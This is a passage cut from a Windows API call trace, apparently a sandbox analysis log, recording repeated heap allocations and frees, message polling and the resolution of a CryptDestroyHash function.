hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.260] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.261] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.261] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.261] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.261] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0257.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.263] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.264] CryptDestroyHash (hHash=0xaa5820) returned 1 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.266] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: 